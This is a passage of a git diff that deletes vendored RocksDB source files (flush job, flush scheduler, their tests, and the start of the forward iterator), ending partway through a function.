-  db_mutex_->AssertHeld();
-  assert(base_ != nullptr);
-  base_->Unref();
-}
-
-Status FlushJob::WriteLevel0Table() {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_FLUSH_WRITE_L0);
-  db_mutex_->AssertHeld();
-  const uint64_t start_micros = db_options_.env->NowMicros();
-  Status s;
-  {
-    db_mutex_->Unlock();
-    if (log_buffer_) {
-      log_buffer_->FlushBufferToLog();
-    }
-    // memtables and range_del_iters store internal iterators over each data
-    // memtable and its associated range deletion memtable, respectively, at
-    // corresponding indexes.
-    std::vector<InternalIterator*> memtables;
-    std::vector<InternalIterator*> range_del_iters;
-    ReadOptions ro;
-    ro.total_order_seek = true;
-    Arena arena;
-    uint64_t total_num_entries = 0, total_num_deletes = 0;
-    size_t total_memory_usage = 0;
-    for (MemTable* m : mems_) {
-      ROCKS_LOG_INFO(
-          db_options_.info_log,
-          "[%s] [JOB %d] Flushing memtable with next log file: %" PRIu64 "\n",
-          cfd_->GetName().c_str(), job_context_->job_id, m->GetNextLogNumber());
-      memtables.push_back(m->NewIterator(ro, &arena));
-      auto* range_del_iter = m->NewRangeTombstoneIterator(ro);
-      if (range_del_iter != nullptr) {
-        range_del_iters.push_back(range_del_iter);
-      }
-      total_num_entries += m->num_entries();
-      total_num_deletes += m->num_deletes();
-      total_memory_usage += m->ApproximateMemoryUsage();
-    }
-
-    event_logger_->Log() << "job" << job_context_->job_id << "event"
-                         << "flush_started"
-                         << "num_memtables" << mems_.size() << "num_entries"
-                         << total_num_entries << "num_deletes"
-                         << total_num_deletes << "memory_usage"
-                         << total_memory_usage;
-
-    {
-      ScopedArenaIterator iter(
-          NewMergingIterator(&cfd_->internal_comparator(), &memtables[0],
-                             static_cast<int>(memtables.size()), &arena));
-      std::unique_ptr<InternalIterator> range_del_iter(NewMergingIterator(
-          &cfd_->internal_comparator(),
-          range_del_iters.empty() ? nullptr : &range_del_iters[0],
-          static_cast<int>(range_del_iters.size())));
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "[%s] [JOB %d] Level-0 flush table #%" PRIu64 ": started",
-                     cfd_->GetName().c_str(), job_context_->job_id,
-                     meta_.fd.GetNumber());
-
-      TEST_SYNC_POINT_CALLBACK("FlushJob::WriteLevel0Table:output_compression",
-                               &output_compression_);
-      EnvOptions optimized_env_options =
-          db_options_.env->OptimizeForCompactionTableWrite(env_options_, db_options_);
-
-      int64_t _current_time = 0;
-      db_options_.env->GetCurrentTime(&_current_time);  // ignore error
-      const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-      uint64_t oldest_key_time = mems_.front()->ApproximateOldestKeyTime();
-
-      s = BuildTable(
-          dbname_, db_options_.env, *cfd_->ioptions(), mutable_cf_options_,
-          optimized_env_options, cfd_->table_cache(), iter.get(),
-          std::move(range_del_iter), &meta_, cfd_->internal_comparator(),
-          cfd_->int_tbl_prop_collector_factories(), cfd_->GetID(),
-          cfd_->GetName(), existing_snapshots_,
-          earliest_write_conflict_snapshot_, output_compression_,
-          cfd_->ioptions()->compression_opts,
-          mutable_cf_options_.paranoid_file_checks, cfd_->internal_stats(),
-          TableFileCreationReason::kFlush, event_logger_, job_context_->job_id,
-          Env::IO_HIGH, &table_properties_, 0 /* level */, current_time,
-          oldest_key_time);
-      LogFlush(db_options_.info_log);
-    }
-    ROCKS_LOG_INFO(db_options_.info_log,
-                   "[%s] [JOB %d] Level-0 flush table #%" PRIu64 ": %" PRIu64
-                   " bytes %s"
-                   "%s",
-                   cfd_->GetName().c_str(), job_context_->job_id,
-                   meta_.fd.GetNumber(), meta_.fd.GetFileSize(),
-                   s.ToString().c_str(),
-                   meta_.marked_for_compaction ? " (needs compaction)" : "");
-
-    if (output_file_directory_ != nullptr) {
-      output_file_directory_->Fsync();
-    }
-    TEST_SYNC_POINT("FlushJob::WriteLevel0Table");
-    db_mutex_->Lock();
-  }
-  base_->Unref();
-
-  // Note that if file_size is zero, the file has been deleted and
-  // should not be added to the manifest.
-  if (s.ok() && meta_.fd.GetFileSize() > 0) {
-    // if we have more than 1 background thread, then we cannot
-    // insert files directly into higher levels because some other
-    // threads could be concurrently producing compacted files for
-    // that key range.
-    // Add file to L0
-    edit_->AddFile(0 /* level */, meta_.fd.GetNumber(), meta_.fd.GetPathId(),
-                   meta_.fd.GetFileSize(), meta_.smallest, meta_.largest,
-                   meta_.smallest_seqno, meta_.largest_seqno,
-                   meta_.marked_for_compaction);
-  }
-
-  // Note that here we treat flush as level 0 compaction in internal stats
-  InternalStats::CompactionStats stats(1);
-  stats.micros = db_options_.env->NowMicros() - start_micros;
-  stats.bytes_written = meta_.fd.GetFileSize();
-  cfd_->internal_stats()->AddCompactionStats(0 /* level */, stats);
-  cfd_->internal_stats()->AddCFStats(InternalStats::BYTES_FLUSHED,
-                                     meta_.fd.GetFileSize());
-  RecordFlushIOStats();
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/flush_job.h b/thirdparty/rocksdb/db/flush_job.h
deleted file mode 100644
index 4698ae7..0000000
--- a/thirdparty/rocksdb/db/flush_job.h
+++ /dev/null
@@ -1,110 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <limits>
-#include <set>
-#include <utility>
-#include <vector>
-#include <string>
-
-#include "db/column_family.h"
-#include "db/dbformat.h"
-#include "db/flush_scheduler.h"
-#include "db/internal_stats.h"
-#include "db/job_context.h"
-#include "db/log_writer.h"
-#include "db/memtable_list.h"
-#include "db/snapshot_impl.h"
-#include "db/version_edit.h"
-#include "db/write_controller.h"
-#include "db/write_thread.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/transaction_log.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/autovector.h"
-#include "util/event_logger.h"
-#include "util/stop_watch.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class MemTable;
-class TableCache;
-class Version;
-class VersionEdit;
-class VersionSet;
-class Arena;
-
-class FlushJob {
- public:
-  // TODO(icanadi) make effort to reduce number of parameters here
-  // IMPORTANT: mutable_cf_options needs to be alive while FlushJob is alive
-  FlushJob(const std::string& dbname, ColumnFamilyData* cfd,
-           const ImmutableDBOptions& db_options,
-           const MutableCFOptions& mutable_cf_options,
-           const EnvOptions& env_options, VersionSet* versions,
-           InstrumentedMutex* db_mutex, std::atomic<bool>* shutting_down,
-           std::vector<SequenceNumber> existing_snapshots,
-           SequenceNumber earliest_write_conflict_snapshot,
-           JobContext* job_context, LogBuffer* log_buffer,
-           Directory* db_directory, Directory* output_file_directory,
-           CompressionType output_compression, Statistics* stats,
-           EventLogger* event_logger, bool measure_io_stats);
-
-  ~FlushJob();
-
-  // Require db_mutex held.
-  // Once PickMemTable() is called, either Run() or Cancel() has to be called.
-  void PickMemTable();
-  Status Run(FileMetaData* file_meta = nullptr);
-  void Cancel();
-  TableProperties GetTableProperties() const { return table_properties_; }
-
- private:
-  void ReportStartedFlush();
-  void ReportFlushInputSize(const autovector<MemTable*>& mems);
-  void RecordFlushIOStats();
-  Status WriteLevel0Table();
-  const std::string& dbname_;
-  ColumnFamilyData* cfd_;
-  const ImmutableDBOptions& db_options_;
-  const MutableCFOptions& mutable_cf_options_;
-  const EnvOptions& env_options_;
-  VersionSet* versions_;
-  InstrumentedMutex* db_mutex_;
-  std::atomic<bool>* shutting_down_;
-  std::vector<SequenceNumber> existing_snapshots_;
-  SequenceNumber earliest_write_conflict_snapshot_;
-  JobContext* job_context_;
-  LogBuffer* log_buffer_;
-  Directory* db_directory_;
-  Directory* output_file_directory_;
-  CompressionType output_compression_;
-  Statistics* stats_;
-  EventLogger* event_logger_;
-  TableProperties table_properties_;
-  bool measure_io_stats_;
-
-  // Variables below are set by PickMemTable():
-  FileMetaData meta_;
-  autovector<MemTable*> mems_;
-  VersionEdit* edit_;
-  Version* base_;
-  bool pick_memtable_called;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/flush_job_test.cc b/thirdparty/rocksdb/db/flush_job_test.cc
deleted file mode 100644
index 34a3c98..0000000
--- a/thirdparty/rocksdb/db/flush_job_test.cc
+++ /dev/null
@@ -1,223 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <algorithm>
-#include <map>
-#include <string>
-
-#include "db/column_family.h"
-#include "db/flush_job.h"
-#include "db/version_set.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/mock_table.h"
-#include "util/file_reader_writer.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// TODO(icanadi) Mock out everything else:
-// 1. VersionSet
-// 2. Memtable
-class FlushJobTest : public testing::Test {
- public:
-  FlushJobTest()
-      : env_(Env::Default()),
-        dbname_(test::TmpDir() + "/flush_job_test"),
-        options_(),
-        db_options_(options_),
-        table_cache_(NewLRUCache(50000, 16)),
-        write_buffer_manager_(db_options_.db_write_buffer_size),
-        versions_(new VersionSet(dbname_, &db_options_, env_options_,
-                                 table_cache_.get(), &write_buffer_manager_,
-                                 &write_controller_)),
-        shutting_down_(false),
-        mock_table_factory_(new mock::MockTableFactory()) {
-    EXPECT_OK(env_->CreateDirIfMissing(dbname_));
-    db_options_.db_paths.emplace_back(dbname_,
-                                      std::numeric_limits<uint64_t>::max());
-    // TODO(icanadi) Remove this once we mock out VersionSet
-    NewDB();
-    std::vector<ColumnFamilyDescriptor> column_families;
-    cf_options_.table_factory = mock_table_factory_;
-    column_families.emplace_back(kDefaultColumnFamilyName, cf_options_);
-
-    EXPECT_OK(versions_->Recover(column_families, false));
-  }
-
-  void NewDB() {
-    VersionEdit new_db;
-    new_db.SetLogNumber(0);
-    new_db.SetNextFile(2);
-    new_db.SetLastSequence(0);
-
-    const std::string manifest = DescriptorFileName(dbname_, 1);
-    unique_ptr<WritableFile> file;
-    Status s = env_->NewWritableFile(
-        manifest, &file, env_->OptimizeForManifestWrite(env_options_));
-    ASSERT_OK(s);
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), EnvOptions()));
-    {
-      log::Writer log(std::move(file_writer), 0, false);
-      std::string record;
-      new_db.EncodeTo(&record);
-      s = log.AddRecord(record);
-    }
-    ASSERT_OK(s);
-    // Make "CURRENT" file that points to the new manifest file.
-    s = SetCurrentFile(env_, dbname_, 1, nullptr);
-  }
-
-  Env* env_;
-  std::string dbname_;
-  EnvOptions env_options_;
-  Options options_;
-  ImmutableDBOptions db_options_;
-  std::shared_ptr<Cache> table_cache_;
-  WriteController write_controller_;
-  WriteBufferManager write_buffer_manager_;
-  ColumnFamilyOptions cf_options_;
-  std::unique_ptr<VersionSet> versions_;
-  InstrumentedMutex mutex_;
-  std::atomic<bool> shutting_down_;
-  std::shared_ptr<mock::MockTableFactory> mock_table_factory_;
-};
-
-TEST_F(FlushJobTest, Empty) {
-  JobContext job_context(0);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  EventLogger event_logger(db_options_.info_log.get());
-  FlushJob flush_job(dbname_, versions_->GetColumnFamilySet()->GetDefault(),
-                     db_options_, *cfd->GetLatestMutableCFOptions(),
-                     env_options_, versions_.get(), &mutex_, &shutting_down_,
-                     {}, kMaxSequenceNumber, &job_context, nullptr, nullptr,
-                     nullptr, kNoCompression, nullptr, &event_logger, false);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    flush_job.PickMemTable();
-    ASSERT_OK(flush_job.Run());
-  }
-  job_context.Clean();
-}
-
-TEST_F(FlushJobTest, NonEmpty) {
-  JobContext job_context(0);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto new_mem = cfd->ConstructNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                           kMaxSequenceNumber);
-  new_mem->Ref();
-  auto inserted_keys = mock::MakeMockFile();
-  // Test data:
-  //   seqno [    1,    2 ... 8998, 8999, 9000, 9001, 9002 ... 9999 ]
-  //   key   [ 1001, 1002 ... 9998, 9999,    0,    1,    2 ...  999 ]
-  //   range-delete "9995" -> "9999" at seqno 10000
-  for (int i = 1; i < 10000; ++i) {
-    std::string key(ToString((i + 1000) % 10000));
-    std::string value("value" + key);
-    new_mem->Add(SequenceNumber(i), kTypeValue, key, value);
-    if ((i + 1000) % 10000 < 9995) {
-      InternalKey internal_key(key, SequenceNumber(i), kTypeValue);
-      inserted_keys.insert({internal_key.Encode().ToString(), value});
-    }
-  }
-  new_mem->Add(SequenceNumber(10000), kTypeRangeDeletion, "9995", "9999a");
-  InternalKey internal_key("9995", SequenceNumber(10000), kTypeRangeDeletion);
-  inserted_keys.insert({internal_key.Encode().ToString(), "9999a"});
-
-  autovector<MemTable*> to_delete;
-  cfd->imm()->Add(new_mem, &to_delete);
-  for (auto& m : to_delete) {
-    delete m;
-  }
-
-  EventLogger event_logger(db_options_.info_log.get());
-  FlushJob flush_job(dbname_, versions_->GetColumnFamilySet()->GetDefault(),
-                     db_options_, *cfd->GetLatestMutableCFOptions(),
-                     env_options_, versions_.get(), &mutex_, &shutting_down_,
-                     {}, kMaxSequenceNumber, &job_context, nullptr, nullptr,
-                     nullptr, kNoCompression, nullptr, &event_logger, true);
-  FileMetaData fd;
-  mutex_.Lock();
-  flush_job.PickMemTable();
-  ASSERT_OK(flush_job.Run(&fd));
-  mutex_.Unlock();
-  ASSERT_EQ(ToString(0), fd.smallest.user_key().ToString());
-  ASSERT_EQ("9999a",
-            fd.largest.user_key().ToString());  // range tombstone end key
-  ASSERT_EQ(1, fd.smallest_seqno);
-  ASSERT_EQ(10000, fd.largest_seqno);  // range tombstone seqnum 10000
-  mock_table_factory_->AssertSingleFile(inserted_keys);
-  job_context.Clean();
-}
-
-TEST_F(FlushJobTest, Snapshots) {
-  JobContext job_context(0);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto new_mem = cfd->ConstructNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                                           kMaxSequenceNumber);
-
-  std::vector<SequenceNumber> snapshots;
-  std::set<SequenceNumber> snapshots_set;
-  int keys = 10000;
-  int max_inserts_per_keys = 8;
-
-  Random rnd(301);
-  for (int i = 0; i < keys / 2; ++i) {
-    snapshots.push_back(rnd.Uniform(keys * (max_inserts_per_keys / 2)) + 1);
-    snapshots_set.insert(snapshots.back());
-  }
-  std::sort(snapshots.begin(), snapshots.end());
-
-  new_mem->Ref();
-  SequenceNumber current_seqno = 0;
-  auto inserted_keys = mock::MakeMockFile();
-  for (int i = 1; i < keys; ++i) {
-    std::string key(ToString(i));
-    int insertions = rnd.Uniform(max_inserts_per_keys);
-    for (int j = 0; j < insertions; ++j) {
-      std::string value(test::RandomHumanReadableString(&rnd, 10));
-      auto seqno = ++current_seqno;
-      new_mem->Add(SequenceNumber(seqno), kTypeValue, key, value);
-      // a key is visible only if:
-      // 1. it's the last one written (j == insertions - 1)
-      // 2. there's a snapshot pointing at it
-      bool visible = (j == insertions - 1) ||
-                     (snapshots_set.find(seqno) != snapshots_set.end());
-      if (visible) {
-        InternalKey internal_key(key, seqno, kTypeValue);
-        inserted_keys.insert({internal_key.Encode().ToString(), value});
-      }
-    }
-  }
-
-  autovector<MemTable*> to_delete;
-  cfd->imm()->Add(new_mem, &to_delete);
-  for (auto& m : to_delete) {
-    delete m;
-  }
-
-  EventLogger event_logger(db_options_.info_log.get());
-  FlushJob flush_job(
-      dbname_, versions_->GetColumnFamilySet()->GetDefault(), db_options_,
-      *cfd->GetLatestMutableCFOptions(), env_options_, versions_.get(), &mutex_,
-      &shutting_down_, snapshots, kMaxSequenceNumber, &job_context, nullptr,
-      nullptr, nullptr, kNoCompression, nullptr, &event_logger, true);
-  mutex_.Lock();
-  flush_job.PickMemTable();
-  ASSERT_OK(flush_job.Run());
-  mutex_.Unlock();
-  mock_table_factory_->AssertSingleFile(inserted_keys);
-  job_context.Clean();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/flush_scheduler.cc b/thirdparty/rocksdb/db/flush_scheduler.cc
deleted file mode 100644
index 8735a6b..0000000
--- a/thirdparty/rocksdb/db/flush_scheduler.cc
+++ /dev/null
@@ -1,88 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/flush_scheduler.h"
-
-#include <cassert>
-
-#include "db/column_family.h"
-
-namespace rocksdb {
-
-void FlushScheduler::ScheduleFlush(ColumnFamilyData* cfd) {
-#ifndef NDEBUG
-  std::lock_guard<std::mutex> lock(checking_mutex_);
-  assert(checking_set_.count(cfd) == 0);
-  checking_set_.insert(cfd);
-#endif  // NDEBUG
-  cfd->Ref();
-// Suppress false positive clang analyzer warnings.
-#ifndef __clang_analyzer__
-  Node* node = new Node{cfd, head_.load(std::memory_order_relaxed)};
-  while (!head_.compare_exchange_strong(
-      node->next, node, std::memory_order_relaxed, std::memory_order_relaxed)) {
-    // failing CAS updates the first param, so we are already set for
-    // retry.  TakeNextColumnFamily won't happen until after another
-    // inter-thread synchronization, so we don't even need release
-    // semantics for this CAS
-  }
-#endif  // __clang_analyzer__
-}
-
-ColumnFamilyData* FlushScheduler::TakeNextColumnFamily() {
-#ifndef NDEBUG
-  std::lock_guard<std::mutex> lock(checking_mutex_);
-#endif  // NDEBUG
-  while (true) {
-    if (head_.load(std::memory_order_relaxed) == nullptr) {
-      return nullptr;
-    }
-
-    // dequeue the head
-    Node* node = head_.load(std::memory_order_relaxed);
-    head_.store(node->next, std::memory_order_relaxed);
-    ColumnFamilyData* cfd = node->column_family;
-    delete node;
-
-#ifndef NDEBUG
-    auto iter = checking_set_.find(cfd);
-    assert(iter != checking_set_.end());
-    checking_set_.erase(iter);
-#endif  // NDEBUG
-
-    if (!cfd->IsDropped()) {
-      // success
-      return cfd;
-    }
-
-    // no longer relevant, retry
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-}
-
-bool FlushScheduler::Empty() {
-#ifndef NDEBUG
-  std::lock_guard<std::mutex> lock(checking_mutex_);
-#endif  // NDEBUG
-  auto rv = head_.load(std::memory_order_relaxed) == nullptr;
-#ifndef NDEBUG
-  assert(rv == checking_set_.empty());
-#endif  // NDEBUG
-  return rv;
-}
-
-void FlushScheduler::Clear() {
-  ColumnFamilyData* cfd;
-  while ((cfd = TakeNextColumnFamily()) != nullptr) {
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-  assert(head_.load(std::memory_order_relaxed) == nullptr);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/flush_scheduler.h b/thirdparty/rocksdb/db/flush_scheduler.h
deleted file mode 100644
index cd35758..0000000
--- a/thirdparty/rocksdb/db/flush_scheduler.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-#include <atomic>
-#include <mutex>
-#include <set>
-
-namespace rocksdb {
-
-class ColumnFamilyData;
-
-// Unless otherwise noted, all methods on FlushScheduler should be called
-// only with the DB mutex held or from a single-threaded recovery context.
-class FlushScheduler {
- public:
-  FlushScheduler() : head_(nullptr) {}
-
-  // May be called from multiple threads at once, but not concurrent with
-  // any other method calls on this instance
-  void ScheduleFlush(ColumnFamilyData* cfd);
-
-  // Removes and returns Ref()-ed column family. Client needs to Unref().
-  // Filters column families that have been dropped.
-  ColumnFamilyData* TakeNextColumnFamily();
-
-  bool Empty();
-
-  void Clear();
-
- private:
-  struct Node {
-    ColumnFamilyData* column_family;
-    Node* next;
-  };
-
-  std::atomic<Node*> head_;
-#ifndef NDEBUG
-  std::mutex checking_mutex_;
-  std::set<ColumnFamilyData*> checking_set_;
-#endif  // NDEBUG
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/forward_iterator.cc b/thirdparty/rocksdb/db/forward_iterator.cc
deleted file mode 100644
index 65fff95..0000000
--- a/thirdparty/rocksdb/db/forward_iterator.cc
+++ /dev/null
@@ -1,905 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "db/forward_iterator.h"
-
-#include <limits>
-#include <string>
-#include <utility>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/job_context.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "table/merging_iterator.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-// Usage:
-//     LevelIterator iter;
-//     iter.SetFileIndex(file_index);
-//     iter.Seek(target);
-//     iter.Next()
-class LevelIterator : public InternalIterator {
- public:
-  LevelIterator(const ColumnFamilyData* const cfd,
-                const ReadOptions& read_options,
-                const std::vector<FileMetaData*>& files)
-      : cfd_(cfd),
-        read_options_(read_options),
-        files_(files),
-        valid_(false),
-        file_index_(std::numeric_limits<uint32_t>::max()),
-        file_iter_(nullptr),
-        pinned_iters_mgr_(nullptr) {}
-
-  ~LevelIterator() {
-    // Reset current pointer
-    if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-      pinned_iters_mgr_->PinIterator(file_iter_);
-    } else {
-      delete file_iter_;
-    }
-  }
-
-  void SetFileIndex(uint32_t file_index) {
-    assert(file_index < files_.size());
-    if (file_index != file_index_) {
-      file_index_ = file_index;
-      Reset();
-    }
-    valid_ = false;
-  }
-  void Reset() {
-    assert(file_index_ < files_.size());
-
-    // Reset current pointer
-    if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-      pinned_iters_mgr_->PinIterator(file_iter_);
-    } else {
-      delete file_iter_;
-    }
-
-    RangeDelAggregator range_del_agg(
-        cfd_->internal_comparator(), {} /* snapshots */);
-    file_iter_ = cfd_->table_cache()->NewIterator(
-        read_options_, *(cfd_->soptions()), cfd_->internal_comparator(),
-        files_[file_index_]->fd,
-        read_options_.ignore_range_deletions ? nullptr : &range_del_agg,
-        nullptr /* table_reader_ptr */, nullptr, false);
-    file_iter_->SetPinnedItersMgr(pinned_iters_mgr_);
-    if (!range_del_agg.IsEmpty()) {
-      status_ = Status::NotSupported(
-          "Range tombstones unsupported with ForwardIterator");
-      valid_ = false;
-    }
-  }
-  void SeekToLast() override {
-    status_ = Status::NotSupported("LevelIterator::SeekToLast()");
-    valid_ = false;
-  }
-  void Prev() override {
-    status_ = Status::NotSupported("LevelIterator::Prev()");
-    valid_ = false;
-  }
-  bool Valid() const override {
-    return valid_;
-  }
-  void SeekToFirst() override {
-    SetFileIndex(0);
-    file_iter_->SeekToFirst();
-    valid_ = file_iter_->Valid();
-  }
-  void Seek(const Slice& internal_key) override {
-    assert(file_iter_ != nullptr);
-    file_iter_->Seek(internal_key);
-    valid_ = file_iter_->Valid();
-  }
-  void SeekForPrev(const Slice& internal_key) override {
-    status_ = Status::NotSupported("LevelIterator::SeekForPrev()");
-    valid_ = false;
-  }
-  void Next() override {
-    assert(valid_);
-    file_iter_->Next();
-    for (;;) {
-      if (file_iter_->status().IsIncomplete() || file_iter_->Valid()) {
-        valid_ = !file_iter_->status().IsIncomplete();
-        return;
-      }
-      if (file_index_ + 1 >= files_.size()) {
-        valid_ = false;
-        return;
-      }
-      SetFileIndex(file_index_ + 1);
-      file_iter_->SeekToFirst();
-    }
-  }
-  Slice key() const override {
-    assert(valid_);
-    return file_iter_->key();
-  }
-  Slice value() const override {
-    assert(valid_);
-    return file_iter_->value();
-  }
-  Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    } else if (file_iter_ && !file_iter_->status().ok()) {
-      return file_iter_->status();
-    }
-    return Status::OK();
-  }
-  bool IsKeyPinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           file_iter_->IsKeyPinned();
-  }
-  bool IsValuePinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           file_iter_->IsValuePinned();
-  }
-  void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-    if (file_iter_) {
-      file_iter_->SetPinnedItersMgr(pinned_iters_mgr_);
-    }
-  }
-
- private:
-  const ColumnFamilyData* const cfd_;
-  const ReadOptions& read_options_;
-  const std::vector<FileMetaData*>& files_;
-
-  bool valid_;
-  uint32_t file_index_;
-  Status status_;
-  InternalIterator* file_iter_;
-  PinnedIteratorsManager* pinned_iters_mgr_;
-};
-
-ForwardIterator::ForwardIterator(DBImpl* db, const ReadOptions& read_options,
-                                 ColumnFamilyData* cfd,
-                                 SuperVersion* current_sv)
-    : db_(db),
-      read_options_(read_options),
-      cfd_(cfd),
-      prefix_extractor_(cfd->ioptions()->prefix_extractor),
-      user_comparator_(cfd->user_comparator()),
-      immutable_min_heap_(MinIterComparator(&cfd_->internal_comparator())),
-      sv_(current_sv),
-      mutable_iter_(nullptr),
-      current_(nullptr),
-      valid_(false),
-      status_(Status::OK()),
-      immutable_status_(Status::OK()),
-      has_iter_trimmed_for_upper_bound_(false),
-      current_over_upper_bound_(false),
-      is_prev_set_(false),
-      is_prev_inclusive_(false),
-      pinned_iters_mgr_(nullptr) {
-  if (sv_) {
-    RebuildIterators(false);
-  }
-}
-
-ForwardIterator::~ForwardIterator() {
-  Cleanup(true);
-}
-
-namespace {
-// Used in PinnedIteratorsManager to release pinned SuperVersion
-static void ReleaseSuperVersionFunc(void* sv) {
-  delete reinterpret_cast<SuperVersion*>(sv);
-}
-}  // namespace
-
-void ForwardIterator::SVCleanup() {
-  if (sv_ != nullptr && sv_->Unref()) {
-    // Job id == 0 means that this is not our background process, but rather
-    // user thread
-    JobContext job_context(0);
-    db_->mutex_.Lock();
-    sv_->Cleanup();
-    db_->FindObsoleteFiles(&job_context, false, true);
-    if (read_options_.background_purge_on_iterator_cleanup) {
-      db_->ScheduleBgLogWriterClose(&job_context);
-    }
-    db_->mutex_.Unlock();
-    if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-      pinned_iters_mgr_->PinPtr(sv_, &ReleaseSuperVersionFunc);
-    } else {
-      delete sv_;
-    }
-    if (job_context.HaveSomethingToDelete()) {
-      db_->PurgeObsoleteFiles(
-          job_context, read_options_.background_purge_on_iterator_cleanup);
-    }
-    job_context.Clean();
-  }
-}
-
-void ForwardIterator::Cleanup(bool release_sv) {
-  if (mutable_iter_ != nullptr) {
-    DeleteIterator(mutable_iter_, true /* is_arena */);
-  }
-
-  for (auto* m : imm_iters_) {
-    DeleteIterator(m, true /* is_arena */);
-  }
-  imm_iters_.clear();
-
-  for (auto* f : l0_iters_) {
-    DeleteIterator(f);
-  }
-  l0_iters_.clear();
-
-  for (auto* l : level_iters_) {
-    DeleteIterator(l);
-  }
-  level_iters_.clear();
-
-  if (release_sv) {
-    SVCleanup();
-  }
-}
-
-bool ForwardIterator::Valid() const {
-  // See UpdateCurrent().
-  return valid_ ? !current_over_upper_bound_ : false;
-}
-
-void ForwardIterator::SeekToFirst() {
-  if (sv_ == nullptr) {
-    RebuildIterators(true);
-  } else if (sv_->version_number != cfd_->GetSuperVersionNumber()) {
-    RenewIterators();
-  } else if (immutable_status_.IsIncomplete()) {
-    ResetIncompleteIterators();
-  }
-  SeekInternal(Slice(), true);
-}
-
-bool ForwardIterator::IsOverUpperBound(const Slice& internal_key) const {
-  return !(read_options_.iterate_upper_bound == nullptr ||
-           cfd_->internal_comparator().user_comparator()->Compare(
-               ExtractUserKey(internal_key),
-               *read_options_.iterate_upper_bound) < 0);
-}
-
-void ForwardIterator::Seek(const Slice& internal_key) {
-  if (IsOverUpperBound(internal_key)) {
-    valid_ = false;
-  }
-  if (sv_ == nullptr) {
-    RebuildIterators(true);
-  } else if (sv_->version_number != cfd_->GetSuperVersionNumber()) {
-    RenewIterators();
-  } else if (immutable_status_.IsIncomplete()) {
-    ResetIncompleteIterators();
-  }
-  SeekInternal(internal_key, false);
-}
-
-void ForwardIterator::SeekInternal(const Slice& internal_key,
-                                   bool seek_to_first) {
-  assert(mutable_iter_);
-  // mutable
-  seek_to_first ? mutable_iter_->SeekToFirst() :
-                  mutable_iter_->Seek(internal_key);
-
-  // immutable
-  // TODO(ljin): NeedToSeekImmutable has negative impact on performance
-  // if it turns to need to seek immutable often. We probably want to have
-  // an option to turn it off.
-  if (seek_to_first || NeedToSeekImmutable(internal_key)) {
-    immutable_status_ = Status::OK();
-    if (has_iter_trimmed_for_upper_bound_ &&
-        (
